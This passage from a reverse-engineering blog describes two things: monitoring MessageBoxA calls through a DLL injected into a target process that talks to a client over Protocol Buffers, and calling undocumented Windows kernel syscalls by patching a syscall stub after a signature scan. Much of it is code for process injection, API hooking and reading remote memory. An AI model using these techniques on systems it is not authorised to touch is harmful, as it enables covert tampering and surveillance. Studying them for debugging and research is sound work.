RCE Endeavors 😅

June 10, 2014

Monitoring APIs with RPC and Protocol Buffers

Filed under: General x86,General x86-64,Programming — admin @ 11:48 PM

This post will discuss API monitoring in a remote process through RPCs (via sockets) and Google’s Protocol Buffers encoding/message interchange format. The purpose is to use the example as a building block for a generic API monitoring client-server application, with the server being resident inside of a DLL that is injected into a remote process. Clients can connect and send messages to install/remove hooks and receive updates from the server when these desired APIs are called by the target application. In summary, the system will interact as follows:

  • A process that is the target of monitoring will be running on the system.
  • A DLL is injected into this process and a server socket is created and begins listening.
  • A separate client application will connect on the server port and begin issuing commands to the server to add/remove hooks.
  • The server will receive these commands and inform the client when the desired API is hit. The parameters will be passed back to the client and the server will wait for a response from the client to continue execution in order for the client to properly process the returned parameters.

Below is the example protocol through which these components interact:

package ApiMonitor.ProtoBuf;

message Call
{
    required uint32 uiHookId = 1;
    
    repeated uint64 uiParameter = 2;
}

message AddHook
{
    required uint32 uiHookId = 1;
    
    required string strDllName = 2;
    required string strFunctionName = 3;
    required uint32 uiNumParameters = 4;
}

message RemoveHook
{
    required uint32 uiHookId = 1;
}

message MonitorMessage
{
    optional AddHook mAddHook = 1;
    optional RemoveHook mRemoveHook = 2;
    
    optional Call mCall = 3;
    
    optional bool bIsContinue = 4;
}

Client/Server components will receive a MonitorMessage, which can contain an add hook message, a remove hook message, a call information message, or a boolean indicating that it is a continue message from the client. The server will operate on AddHook/RemoveHook by performing the appropriate actions, and will generate Call messages containing the values of the parameters as they are retrieved from the stack as part of the added API hook. The client will generate AddHook/RemoveHook messages, or send a continue message to the server by sending a message with bIsContinue set to true. The client will additionally operate on received Call messages from the server and, for this example, display the parameters of the hooked function. Special identifiers (uiHookId) will identify individual hooks for easy removal or dispatching of received call messages. The example code I provide only shows one hooked function, but the idea can be extended to an arbitrary number of hooks.
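To make the uiHookId bookkeeping a bit more concrete, here is a minimal sketch of a table that tracks several hooks by identifier. It is not part of the provided source: HookEntry, HookTable, hook_add, hook_find and hook_remove are hypothetical names, and the fixed capacity of 16 is an arbitrary assumption.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define MAX_HOOKS 16 /* arbitrary capacity chosen for the sketch */

/* Hypothetical bookkeeping record mirroring the fields of the AddHook message. */
typedef struct {
    uint32_t id;           /* uiHookId */
    char     dll[64];      /* strDllName */
    char     function[64]; /* strFunctionName */
    uint32_t num_params;   /* uiNumParameters */
    int      in_use;
} HookEntry;

typedef struct {
    HookEntry entries[MAX_HOOKS];
} HookTable;

/* Returns the entry registered under id, or NULL if there is none. */
static HookEntry *hook_find(HookTable *table, uint32_t id)
{
    assert(table != NULL);
    for (size_t i = 0; i < MAX_HOOKS; ++i) {
        if (table->entries[i].in_use && table->entries[i].id == id) {
            return &table->entries[i];
        }
    }
    return NULL;
}

/* Registers a hook. Returns 0 on success, -1 if the id is taken or the table is full. */
static int hook_add(HookTable *table, uint32_t id, const char *dll,
                    const char *function, uint32_t num_params)
{
    assert(table != NULL && dll != NULL && function != NULL);
    if (hook_find(table, id) != NULL) {
        return -1;
    }
    for (size_t i = 0; i < MAX_HOOKS; ++i) {
        HookEntry *e = &table->entries[i];
        if (!e->in_use) {
            e->id = id;
            strncpy(e->dll, dll, sizeof(e->dll) - 1);
            e->dll[sizeof(e->dll) - 1] = '\0';
            strncpy(e->function, function, sizeof(e->function) - 1);
            e->function[sizeof(e->function) - 1] = '\0';
            e->num_params = num_params;
            e->in_use = 1;
            return 0;
        }
    }
    return -1;
}

/* Removes a hook by id. Returns 0 on success, -1 if no such hook exists. */
static int hook_remove(HookTable *table, uint32_t id)
{
    HookEntry *e = hook_find(table, id);
    if (e == NULL) {
        return -1;
    }
    e->in_use = 0;
    return 0;
}
```

With something like this, the server could look up the entry for an incoming RemoveHook message, and the client could use the same identifier to decide how to interpret the parameters of a received Call message.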

Adding a hook becomes pretty straightforward. From the client code:

ApiMonitor::ProtoBuf::MonitorMessage mOutgoingMessage;
mOutgoingMessage.mutable_maddhook()->set_uihookid(0x123);
mOutgoingMessage.mutable_maddhook()->set_strdllname("user32.dll", 10);
mOutgoingMessage.mutable_maddhook()->set_strfunctionname("MessageBoxA", 11);
mOutgoingMessage.mutable_maddhook()->set_uinumparameters(4);
(void)SendOutgoingMessage(sckConnect, &mOutgoingMessage);

with SendOutgoingMessage being responsible for serialization of the Protocol Buffer message. Each message is sent in two parts: the first contains the size of the serialized message, and the second contains the bytes of the message itself. This functionality is used by both the client and the server.

const bool Send(SOCKET sckConnect, const char *pBuffer, int uiBufferLength)
{
    int iResult = send(sckConnect, (const char *)pBuffer, uiBufferLength, 0);
    if (iResult == SOCKET_ERROR)
    {
        printf("send failed. Error = %X\n", WSAGetLastError());
        closesocket(sckConnect);
        WSACleanup();
        return false;
    }
 
    return true;
}
 
const bool SendOutgoingMessage(SOCKET sckConnect, ApiMonitor::ProtoBuf::MonitorMessage *pMessage)
{
    const int iBuffSize = pMessage->ByteSize();
 
    char *pBuffer = (char *)malloc(iBuffSize * sizeof(char));
    pMessage->SerializePartialToArray(pBuffer, iBuffSize);
 
    bool bRet = Send(sckConnect, (const char *)&iBuffSize, sizeof(int));
    bRet &= Send(sckConnect, pBuffer, iBuffSize);
 
    free(pBuffer);
 
    return bRet;
}
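The wire format produced by SendOutgoingMessage is a simple length-prefixed frame. As a rough, socket-free sketch of that framing (frame_encode and frame_decode are hypothetical helpers, not part of the provided source), the layout can be written out as below. One assumption to flag: the sketch writes the length as an explicit 4-byte little-endian value, which matches what sending a raw int produces on x86/x64 but is spelled out here so it does not depend on the host byte order.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define FRAME_HEADER_SIZE 4 /* size of the length prefix in bytes */

/* Writes a 4-byte little-endian length followed by the payload into out.
 * Returns the total frame size, or 0 if out is too small. */
static size_t frame_encode(const uint8_t *payload, uint32_t payload_len,
                           uint8_t *out, size_t out_capacity)
{
    assert(out != NULL && (payload != NULL || payload_len == 0));
    if (out_capacity < FRAME_HEADER_SIZE ||
        out_capacity - FRAME_HEADER_SIZE < payload_len) {
        return 0;
    }
    out[0] = (uint8_t)(payload_len & 0xFF);
    out[1] = (uint8_t)((payload_len >> 8) & 0xFF);
    out[2] = (uint8_t)((payload_len >> 16) & 0xFF);
    out[3] = (uint8_t)((payload_len >> 24) & 0xFF);
    if (payload_len > 0) {
        memcpy(out + FRAME_HEADER_SIZE, payload, payload_len);
    }
    return FRAME_HEADER_SIZE + (size_t)payload_len;
}

/* Reads the length prefix and locates the payload inside the frame.
 * Returns 0 on success, -1 if the buffer is shorter than the header
 * plus the announced payload length. */
static int frame_decode(const uint8_t *frame, size_t frame_len,
                        const uint8_t **payload, uint32_t *payload_len)
{
    uint32_t len;
    assert(frame != NULL && payload != NULL && payload_len != NULL);
    if (frame_len < FRAME_HEADER_SIZE) {
        return -1;
    }
    len = (uint32_t)frame[0] |
          ((uint32_t)frame[1] << 8) |
          ((uint32_t)frame[2] << 16) |
          ((uint32_t)frame[3] << 24);
    if (frame_len - FRAME_HEADER_SIZE < len) {
        return -1;
    }
    *payload = frame + FRAME_HEADER_SIZE;
    *payload_len = len;
    return 0;
}
```

Building the whole frame in one buffer would also allow it to go out in a single send call instead of two, though the two-call approach shown above works just as well for this example.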

On the server receiving end, the messages are read from the socket and the MonitorMessage is reconstructed. The fields are checked and the appropriate dispatch happens.

int iResult = 0;
do
{
    int iBuffSize = 0;
    iResult = recv(sckClient, (char *)&iBuffSize, sizeof(int), 0);
    if (iResult <= 0)
    {
        // Connection closed or receive error: stop before using iBuffSize.
        break;
    }
    char *pBuffer = (char *)malloc(iBuffSize * sizeof(char));
    iResult = recv(sckClient, pBuffer, iBuffSize, 0);
 
    ApiMonitor::ProtoBuf::MonitorMessage mReceivedMessage;
    mReceivedMessage.ParseFromArray(pBuffer, iBuffSize);
    if (mReceivedMessage.has_biscontinue())
    {
        SetEvent(hWaitEvent);
    }
    else if (mReceivedMessage.has_maddhook())
    {
        (void)AddHook(mReceivedMessage.maddhook().uihookid(),
            mReceivedMessage.maddhook().strdllname().c_str(),
            mReceivedMessage.maddhook().strfunctionname().c_str(),
            mReceivedMessage.maddhook().uinumparameters(), &dwAddress);
    }
    else if (mReceivedMessage.has_mremovehook())
    {
        (void)RemoveHook(mReceivedMessage.mremovehook().uihookid(), dwAddress);
    }
 
    free(pBuffer);
} while (iResult > 0);
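One caveat about the receive loop above: on a stream socket, a single recv call is allowed to return fewer bytes than requested, so a more careful version would keep reading until the whole length prefix or message body has arrived. Below is a minimal sketch of that idea. It is written against a hypothetical read_fn callback rather than recv directly so that it stays self-contained; MemoryStream and memory_read exist only to imitate a socket that delivers data in small pieces.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical reader callback: reads up to len bytes into buf and returns the
 * number of bytes read, 0 at end of stream, or a negative value on error.
 * A thin wrapper around recv() would have this shape. */
typedef int (*read_fn)(void *ctx, char *buf, int len);

/* Keeps calling the reader until exactly len bytes have arrived.
 * Returns 1 on success, 0 if the stream ended early, -1 on error. */
static int read_exact(read_fn reader, void *ctx, char *buf, int len)
{
    int total = 0;
    assert(reader != NULL && buf != NULL && len >= 0);
    while (total < len) {
        int got = reader(ctx, buf + total, len - total);
        if (got == 0) {
            return 0;
        }
        if (got < 0) {
            return -1;
        }
        total += got;
    }
    return 1;
}

/* Demonstration stream backed by memory that hands out at most `chunk`
 * bytes per call, imitating a socket that delivers data in pieces. */
typedef struct {
    const char *data;
    int remaining;
    int chunk;
} MemoryStream;

static int memory_read(void *ctx, char *buf, int len)
{
    MemoryStream *s = (MemoryStream *)ctx;
    int n = len;
    if (n > s->chunk) {
        n = s->chunk;
    }
    if (n > s->remaining) {
        n = s->remaining;
    }
    memcpy(buf, s->data, (size_t)n);
    s->data += n;
    s->remaining -= n;
    return n;
}
```

In the server loop, the two recv calls would each be replaced by one call to a helper like read_exact, first for the sizeof(int) prefix and then for the iBuffSize bytes of the message.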

If the message is a continue message, an event is signaled to allow the thread that invoked the target API to continue (this will be discussed further in a bit). Otherwise, if the message is an add or remove hook message, the appropriate actions to add/remove the hook are taken. The code for this won’t be shown here because the technique has been discussed several times before (see memory breakpoints or the previous usage of them). Additionally, the full source code for all of this is provided. Once the hook is installed and the target API is hit, it will trampoline to a hook function which will retrieve the parameters from the current execution context. The implementation is shown below:

static void WINAPI HookFunction(CONTEXT *pContext)
{
    EnterCriticalSection(&critSec);
 
    ApiMonitor::ProtoBuf::MonitorMessage mCallMessage;
#ifdef _M_IX86
    for(DWORD_PTR i = 0; i < dwHookNumParameters; ++i)
    {
        DWORD_PTR dwParameter = *(DWORD_PTR *)(pContext->Esp + sizeof(DWORD_PTR) + (i * sizeof(DWORD_PTR)));
        mCallMessage.mutable_mcall()->add_uiparameter(dwParameter);
    }
#elif defined _M_AMD64
    mCallMessage.mutable_mcall()->add_uiparameter(pContext->Rcx);
    mCallMessage.mutable_mcall()->add_uiparameter(pContext->Rdx);
    mCallMessage.mutable_mcall()->add_uiparameter(pContext->R8);
    mCallMessage.mutable_mcall()->add_uiparameter(pContext->R9);
#else
#error "Unsupported platform"
#endif
    mCallMessage.mutable_mcall()->set_uihookid(dwHookId);
 
    SendOutgoingMessage(sckOutgoing, &mCallMessage);
 
    WaitForSingleObject(hWaitEvent, INFINITE);
 
    LeaveCriticalSection(&critSec);
}

For x86, the parameters are retrieved directly from the stack. For x64, the first four parameters are retrieved from registers as per the x64 ABI on Windows. If more parameters were to be retrieved for x64, there would have to be an additional field to specify the stack offset at which they start. The example keeps it simple and uses an API (MessageBoxA) with only four parameters. These values are added to a Call message and sent back to the client. The thread then halts execution, waiting for an event to be signaled. This is the event that is signaled via SetEvent(hWaitEvent); on the listening thread.
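As a rough illustration of where a fifth or later parameter would live on x64, here is a small sketch. It assumes the context is captured at the very first instruction of the hooked function (before the prologue adjusts RSP) and only covers integer/pointer arguments; X64EntryState, x64_stack_arg_offset and x64_read_arg are hypothetical names used for the example. Under the Windows x64 convention, [rsp] holds the return address at that point and the next four slots are the home space reserved for the register arguments, so the fifth argument sits at rsp + 0x28.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical snapshot of the state at the first instruction of the hooked function. */
typedef struct {
    uint64_t rcx, rdx, r8, r9; /* first four integer/pointer arguments */
    const uint64_t *rsp;       /* stack pointer; rsp[0] is the return address */
} X64EntryState;

/* Byte offset from RSP (at function entry) of stack-passed argument `index`,
 * where index is zero-based and must be 4 or greater. Slot 0 is the return
 * address and slots 1..4 are the home space for the register arguments. */
static size_t x64_stack_arg_offset(unsigned index)
{
    assert(index >= 4);
    return sizeof(uint64_t) * (1u + index);
}

/* Reads argument `index` from registers (0..3) or from the stack (4 and up). */
static uint64_t x64_read_arg(const X64EntryState *state, unsigned index)
{
    assert(state != NULL);
    switch (index) {
    case 0: return state->rcx;
    case 1: return state->rdx;
    case 2: return state->r8;
    case 3: return state->r9;
    default:
        assert(state->rsp != NULL);
        return state->rsp[x64_stack_arg_offset(index) / sizeof(uint64_t)];
    }
}
```

In the hook function this would translate to reading from pContext->Rsp plus the computed offset for every parameter index beyond the fourth.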
Going back to the client, the code for handling this Call message is shown below:

do
{
    ApiMonitor::ProtoBuf::MonitorMessage mIncomingMessage = ReceiveIncomingMessage(sckConnect);
    assert(mIncomingMessage.mcall().uihookid() == 0x123);
 
    HWND hWnd = (HWND)mIncomingMessage.mcall().uiparameter(0);
    DWORD_PTR dwTextAddress = (DWORD_PTR)mIncomingMessage.mcall().uiparameter(1);
    DWORD_PTR dwCaptionAddress = (DWORD_PTR)mIncomingMessage.mcall().uiparameter(2);
    UINT uiType = (UINT)mIncomingMessage.mcall().uiparameter(3);
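    // Plain character buffers (not arrays of pointers) receive the remote strings.
    CHAR lpTextBuffer[64] = { 0 };
    CHAR lpTitleBuffer[64] = { 0 };
 
    DWORD dwProcessId = atoi(argv[1]);
    HANDLE hProcess = OpenProcess(PROCESS_VM_READ | PROCESS_VM_WRITE, FALSE, dwProcessId);
    SIZE_T dwBytesRead = 0;
    // Read one byte less than the buffer size so the result stays null-terminated.
    (void)ReadProcessMemory(hProcess, (LPCVOID)dwTextAddress, lpTextBuffer, sizeof(lpTextBuffer) - 1, &dwBytesRead);
    (void)ReadProcessMemory(hProcess, (LPCVOID)dwCaptionAddress, lpTitleBuffer, sizeof(lpTitleBuffer) - 1, &dwBytesRead);
    // Release the handle each iteration so it is not leaked.
    CloseHandle(hProcess);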
 
    printf("Parameters\n"
        "HWND: %p\n"
        "Text: %s\n"
        "Title: %s\n"
        "Type: %X\n",
        (void *)hWnd, lpTextBuffer, lpTitleBuffer, uiType);
 
    mOutgoingMessage.Clear();
    mOutgoingMessage.set_biscontinue(true);
    (void)SendOutgoingMessage(sckConnect, &mOutgoingMessage);
} while (!GetAsyncKeyState(VK_F12));

The parameters are retrieved from the message. Two of these parameters are addresses, specifically the MessageBox text and caption. These need to be read from the target process's memory, which is done via ReadProcessMemory. After they are retrieved and output, the client creates a Continue message and sends it back to the server to continue execution there. After monitoring is finished (via an F12 key press), the client sends a remove hook message with the following:

mOutgoingMessage.Clear();
mOutgoingMessage.mutable_mremovehook()->set_uihookid(0x123);
(void)SendOutgoingMessage(sckConnect, &mOutgoingMessage);

which removes the hook from the target process.

Taking a look at it in action, an example application which repeatedly calls MessageBoxA via

MessageBoxA(NULL, "Hello, World!", "Test", MB_ICONINFORMATION);

is available. Below is a screenshot of the client after the server DLL was injected into this process.

[Screenshot: rpchook]

The full source code relating to this can be found here. The static libraries were compiled with VS 2013 and will need to be recompiled if other compilers are used.

December 6, 2013

Calling Undocumented APIs in the Windows Kernel

Filed under: General x86,General x86-64,Reverse Engineering — admin @ 7:51 PM

Background

This post takes a different approach from the others and delves into the world of the Windows kernel. Specifically, it will cover how to access the undocumented APIs that are present within the kernel (ntoskrnl). If you trace a Windows API call from usermode to the kernel, you will find the endpoint to be something similar to what is shown below (Win 8 x64):

public NtOpenFile
NtOpenFile proc near
4C 8B D1                           mov r10, rcx
B8 31 00 00 00                     mov eax, 31h
0F 05                              syscall
C3                                 retn
NtOpenFile endp

where the r10 register holds the value of the first argument and eax holds the index into the Windows internal syscall table. A note should be made that this is specific to an x64 operating system running a native x64 application. x86 systems rely on going through KiFastSystemCall in ntdll to invoke a syscall, and WOW64 emulation relies on making transitions from x64 to x86 and back and setting up an appropriate stack in-between. When the syscall instruction executes, the flow of code will eventually find its way to NtOpenFile in ntoskrnl. This is actually a wrapper around IopCreateFile (shown below):

public NtOpenFile
NtOpenFile proc near
4C 8B DC                            mov     r11, rsp
48 81 EC 88 00 00 00                sub     rsp, 88h
8B 84 24 B8 00 00 00                mov     eax, [rsp+88h+arg_28]
45 33 D2                            xor     r10d, r10d
4D 89 53 F0                         mov     [r11-10h], r10
C7 44 24 70 20 00 00 00             mov     [rsp+88h+var_18], 20h
45 89 53 E0                         mov     [r11-20h], r10d
4D 89 53 D8                         mov     [r11-28h], r10
45 89 53 D0                         mov     [r11-30h], r10d
45 89 53 C8                         mov     [r11-38h], r10d
4D 89 53 C0                         mov     [r11-40h], r10
89 44 24 40                         mov     [rsp+88h+var_48], eax
8B 84 24 B0 00 00 00                mov     eax, [rsp+88h+arg_20]
C7 44 24 38 01 00 00 00             mov     [rsp+88h+var_50], 1
89 44 24 30                         mov     [rsp+88h+var_58], eax
45 89 53 A0                         mov     [r11-60h], r10d
4D 89 53 98                         mov     [r11-68h], r10
E8 48 E2 FC FF                      call    IopCreateFile
48 81 C4 88 00 00 00                add     rsp, 88h
C3                                  retn
NtOpenFile endp

Again it should be noted that there was a lot of hand-waving going on here, and that the syscall instruction does not simply invoke the native kernel API, but goes through several routines responsible for setting up trap frames and performing access checks before arriving at the native API implementation.
Exported native kernel APIs for use in drivers follow a similar, though far less complex, mechanism. Every Zw* function in the kernel provides a thin wrapper around a call to the Nt* version (example shown below):

NTSTATUS __stdcall ZwOpenFile(PHANDLE FileHandle,
    ACCESS_MASK DesiredAccess,
    POBJECT_ATTRIBUTES ObjectAttributes,
    PIO_STATUS_BLOCK IoStatusBlock,
    ULONG ShareAccess,
    ULONG OpenOptions)
ZwOpenFile proc near
48 8B C4                            mov     rax, rsp
FA                                  cli
48 83 EC 10                         sub     rsp, 10h
50                                  push    rax
9C                                  pushfq
6A 10                               push    10h
48 8D 05 BD 2F 00 00                lea     rax, KiServiceLinkage
50                                  push    rax
B8 31 00 00 00                      mov     eax, 31h
E9 C2 DA FF FF                      jmp     KiServiceInternal
ZwOpenFile endp

This wrapper does basic things such as set up the stack, disable kernel interrupts (cli), and preserve flags. The KiServiceLinkage function is just a small stub that executes the ret instruction immediately. I have not had a chance to reverse it to see what purpose it serves — it was never even invoked when a breakpoint was set on it. Lastly, the syscall number (0x31) is put into eax and a jump to the KiServiceInternal routine is made. This routine, among other things, is responsible for setting the correct PreviousMode and traversing the Windows syscall table (commonly referred to as the System Service Dispatch Table, or SSDT) and invoking the native Nt* version of the API.
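Both stubs above load the syscall number with a mov eax, imm32 instruction (B8 31 00 00 00). For the user-mode stub, whose layout is fixed in the listing shown earlier, the number can be read straight out of the bytes. The sketch below does that for exactly the byte pattern from that listing; extract_syscall_index is a hypothetical helper, and the pattern is an assumption tied to that listing (Win 8 x64), so other Windows builds may lay the stub out differently.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Extracts the syscall index from a user-mode stub of the form
 *   4C 8B D1          mov r10, rcx
 *   B8 xx xx xx xx    mov eax, imm32
 *   0F 05             syscall
 * Returns 0 and stores the index on success, or -1 if the bytes do not match. */
static int extract_syscall_index(const uint8_t *stub, size_t stub_len,
                                 uint32_t *index)
{
    static const uint8_t prologue[] = { 0x4C, 0x8B, 0xD1, 0xB8 };
    static const uint8_t syscall_op[] = { 0x0F, 0x05 };
    const size_t imm_offset = sizeof(prologue);
    const size_t syscall_offset = imm_offset + 4;

    assert(stub != NULL && index != NULL);
    if (stub_len < syscall_offset + sizeof(syscall_op)) {
        return -1;
    }
    if (memcmp(stub, prologue, sizeof(prologue)) != 0) {
        return -1;
    }
    if (memcmp(stub + syscall_offset, syscall_op, sizeof(syscall_op)) != 0) {
        return -1;
    }
    /* The immediate is stored little-endian. */
    *index = (uint32_t)stub[imm_offset] |
             ((uint32_t)stub[imm_offset + 1] << 8) |
             ((uint32_t)stub[imm_offset + 2] << 16) |
             ((uint32_t)stub[imm_offset + 3] << 24);
    return 0;
}
```

Fed the NtOpenFile stub bytes from the first listing, this yields 0x31, the same value that ZwOpenFile places in eax before jumping to KiServiceInternal.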

Getting Access to the APIs

So what is the relevance of all of this? The answer is that even though the kernel exports a ton of APIs for kernel/driver developers, there are still plenty of others that provide some pretty cool functionality but are not available, such as ZwSuspendProcess/ZwResumeProcess, ZwReadVirtualMemory/ZwWriteVirtualMemory, etc. Getting access to those APIs is really where this post begins. Before starting, there are several clear issues that need to be resolved:

  • The base address and image size in memory of the kernel (ntoskrnl) need to be found, because the APIs lie somewhere within that memory region.
  • The syscalls need to be identified and there should be a generic way developed to allow us to invoke them.
  • Other issues related to using the APIs should be addressed. For example, process enumeration in the kernel in order to get a valid process handle for the target process in a ZwSuspend/ZwResume call.

Addressing these in order, the first point is relatively simple, but also relies on undocumented features. Getting the address of the kernel in memory is as simple as calling ZwQuerySystemInformation with the undocumented SystemModuleInformation value of SYSTEM_INFORMATION_CLASS. The supplied buffer is filled with a SYSTEM_MODULE_INFORMATION structure containing a count of loaded modules followed by a variable-length array of SYSTEM_MODULE entries. A quick note to add is that the NtInternals documentation on the structure is a bit outdated, and that the first two fields are of type ULONG_PTR instead of always a 32-bit ULONG. Finding the kernel base address and image size is simply a traversal of the SYSTEM_MODULE array and a substring search for the kernel name. The code is shown below:

PSYSTEM_MODULE GetKernelModuleInfo(VOID) {
 
    PSYSTEM_MODULE SystemModule = NULL;
    PSYSTEM_MODULE FoundModule = NULL;
    ULONG_PTR SystemInfoLength = 0;
    PVOID Buffer = NULL;
    ULONG Count = 0;
    ULONG i = 0;
    ULONG j = 0;
    //Other names for WinXP
    CONST CHAR *KernelNames[] = { "ntoskrnl.exe", "ntkrnlmp.exe", "ntkrnlpa.exe", "ntkrpamp.exe" };
 
    //Perform error checking on the calls in actual code
    (VOID)ZwQuerySystemInformation(SystemModuleInformation, &SystemInfoLength, 0, &SystemInfoLength);
    Buffer = ExAllocatePool(NonPagedPool, SystemInfoLength);
    (VOID)ZwQuerySystemInformation(SystemModuleInformation, Buffer, SystemInfoLength, NULL);
 
    Count = ((PSYSTEM_MODULE_INFORMATION)Buffer)->ModulesCount;
    for(i = 0; i < Count; ++i) {         
        SystemModule = &((PSYSTEM_MODULE_INFORMATION)Buffer)->Modules[i];
        for(j = 0; j < sizeof(KernelNames) / sizeof(KernelNames[0]); ++j) {             
            if(strstr((LPCSTR)SystemModule->Name, KernelNames[j]) != NULL) {
                FoundModule = (PSYSTEM_MODULE)ExAllocatePool(NonPagedPool, sizeof(SYSTEM_MODULE));
                RtlCopyMemory(FoundModule, SystemModule, sizeof(SYSTEM_MODULE));
                ExFreePool(Buffer);
                return FoundModule;
            }
        }
    }
    DbgPrint("Could not find the kernel in module list\n");
    //Release the module list on the failure path as well
    ExFreePool(Buffer);
    return NULL;
}

The above function will return the PSYSTEM_MODULE corresponding to information about the kernel (or NULL in the failure case). Now that the base address and image size of the kernel are known, it is possible to begin coming up with a way to invoke the undocumented syscalls.
Since all of the undocumented Zw* calls are nearly identical wrappers (differing only in the syscall number) invoking KiSystemService, I present a generic way of invoking these calls: create a functionally equivalent template in kernel memory and execute from that. The general idea is to create a blank template such as the one shown below:

BYTE NullStub = 0xC3;
 
BYTE SyscallTemplate[] = {
    0x48, 0x8B, 0xC4,                                           /*mov rax, rsp*/
    0xFA,                                                       /*cli*/
    0x48, 0x83, 0xEC, 0x10,                                     /*sub rsp, 0x10*/
    0x50,                                                       /*push rax*/
    0x9C,                                                       /*pushfq*/
    0x6A, 0x10,                                                 /*push 0x10*/
    0x48, 0xB8, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, 0xAA, /*mov rax, NullStubAddress*/
    0x50,                                                       /*push rax*/
    0xB8, 0xBB, 0xBB, 0xBB, 0xBB,                               /*mov eax, Syscall*/
    0x68, 0xCC, 0xCC, 0xCC, 0xCC,                               /*push LowBytes*/
    0xC7, 0x44, 0x24, 0x04, 0xCC, 0xCC, 0xCC, 0xCC,             /*mov [rsp+0x4], HighBytes*/
    0xC3                                                        /*ret*/
};

in non-paged memory, patch in the correct addresses (NullStub replacing KiServiceLinkage), patch in the syscall number, then invoke KiSystemService (here done by placing the 64-bit absolute address on the stack and returning to it). Once fully patched at runtime, this data can simply be cast to the appropriate function pointer and invoked like normal. Here is the allocation and patching routine:

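//NumParameters is only needed by the x86 stub in the full listing (for its retn operand)
PVOID CreateSyscallWrapper(IN LONG Index, IN SHORT NumParameters) {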
 
    PVOID Buffer = ExAllocatePool(NonPagedPool, sizeof(SyscallTemplate));
    BYTE *NullStubAddress = &NullStub;
    BYTE *NullStubAddressIndex = ((BYTE *)Buffer) + (14 * sizeof(BYTE));
    BYTE *SyscallIndex = ((BYTE *)Buffer) + (24 * sizeof(BYTE));
    BYTE *LowBytesIndex = ((BYTE *)Buffer) + (29 * sizeof(BYTE));
    BYTE *HighBytesIndex = ((BYTE *)Buffer) + (37 * sizeof(BYTE));
    ULONG LowAddressBytes = ((ULONG_PTR)KiSystemService) & 0xFFFFFFFF;
    ULONG HighAddressBytes = ((ULONG_PTR)KiSystemService >> 32);
    RtlCopyMemory(Buffer, SyscallTemplate, sizeof(SyscallTemplate));
    RtlCopyMemory(NullStubAddressIndex, (PVOID)&NullStubAddress, sizeof(BYTE *));
    RtlCopyMemory(SyscallIndex, &Index, sizeof(LONG));
    RtlCopyMemory(LowBytesIndex, &LowAddressBytes, sizeof(ULONG));
    RtlCopyMemory(HighBytesIndex, &HighAddressBytes, sizeof(ULONG));
    return Buffer;
}

Example usage is shown below:

typedef NTSTATUS (NTAPI *pZwSuspendProcess)(IN HANDLE ProcessHandle);
pZwSuspendProcess ZwSuspendProcess = (pZwSuspendProcess)CreateSyscallWrapper(0x017A, 1);
//This can then be invoked as normal, e.g, ZwSuspendProcess(x);
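The patch offsets hard-coded in CreateSyscallWrapper (14, 24, 29 and 37) have to stay in sync with the template bytes. As a cross-check, they can be recovered by searching the template for its placeholder runs. The helper below is a small sketch of that idea; find_marker_run is a hypothetical name and is not part of the provided source.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Returns the offset of the first run of `count` consecutive bytes equal to
 * `marker`, searching from offset `start`, or -1 if there is no such run. */
static long find_marker_run(const uint8_t *code, size_t code_len,
                            size_t start, uint8_t marker, size_t count)
{
    assert(code != NULL && count > 0);
    for (size_t i = start; i + count <= code_len; ++i) {
        size_t j = 0;
        while (j < count && code[i + j] == marker) {
            ++j;
        }
        if (j == count) {
            return (long)i;
        }
    }
    return -1;
}
```

Run against SyscallTemplate, searching for eight 0xAA bytes gives 14, four 0xBB bytes gives 24, four 0xCC bytes gives 29, and searching again for four 0xCC bytes starting at offset 33 gives 37, which agrees with the constants used in the patching routine.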

However, before doing that, the address of KiServiceInternal (stored in the KiSystemService pointer in the code) needs to be found so it can be properly patched in. This is, after all, partially why finding the base address of the kernel was important. This is done by scanning for the function signature through the entirety of ntoskrnl’s memory. The signature must be long enough to be unique, but preferably not so long that comparisons take a lot of time. The signature that I used for this example is shown below:

typedef VOID (*pKiSystemService)(VOID);
pKiSystemService KiSystemService;
 
NTSTATUS ResolveFunctions(IN PSYSTEM_MODULE KernelInfo) {
    CONST BYTE KiSystemServiceSignature[] =
    {
        0x48, 0x83, 0xEC, 0x08, 0x55, 0x48, 0x81, 0xEC, 0x58, 0x01,
        0x00, 0x00, 0x48, 0x8D, 0xAC, 0x24, 0x80, 0x00, 0x00, 0x00,
        0x48, 0x89, 0x9D, 0xC0, 0x00, 0x00, 0x00, 0x48, 0x89, 0xBD,
        0xC8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xB5, 0xD0, 0x00, 0x00,
        0x00, 0xFB, 0x65, 0x48, 0x8B, 0x1C, 0x25, 0x88, 0x01, 0x00,
        0x00
    };
    KiSystemService = (pKiSystemService)FindFunctionInModule(KiSystemServiceSignature,
        sizeof(KiSystemServiceSignature), KernelInfo->ImageBaseAddress, KernelInfo->ImageSize);
    if(KiSystemService == NULL) {
        DbgPrint("- Could not find KiSystemService\n");
        return STATUS_UNSUCCESSFUL;
    }
    DbgPrint("+ Found KiSystemService at %p\n", KiSystemService);
    //....
}
 
...
...
 
PVOID FindFunctionInModule(IN CONST BYTE *Signature, IN ULONG SignatureSize,
    IN PVOID KernelBaseAddress, IN ULONG ImageSize) {
 
    BYTE *CurrentAddress = 0;
    ULONG i = 0;
 
    DbgPrint("+ Scanning from %p to %p\n", KernelBaseAddress, (ULONG_PTR)KernelBaseAddress + ImageSize);
    CurrentAddress = (BYTE *)KernelBaseAddress;
 
    //Stop early enough that the comparison never reads past the end of the image
    for(i = 0; i + SignatureSize <= ImageSize; ++i) {
        if(RtlCompareMemory(CurrentAddress, Signature, SignatureSize) == SignatureSize) {
            DbgPrint("+ Found function at %p\n", CurrentAddress);
            return (PVOID)CurrentAddress;
        }
        ++CurrentAddress;
    }
    return NULL;
}

Once the ResolveFunctions() function executes, the CreateSyscallWrapper function is ready to be used as shown above. This will now resolve any syscall that you wish to call.
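Since the scan returns the first match, it is worth checking that a chosen signature really is unique within the image. A minimal sketch of such a check is shown below; count_signature_matches is a hypothetical helper that works on any byte buffer, so it could be tried offline against a copy of the kernel image rather than inside the driver.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
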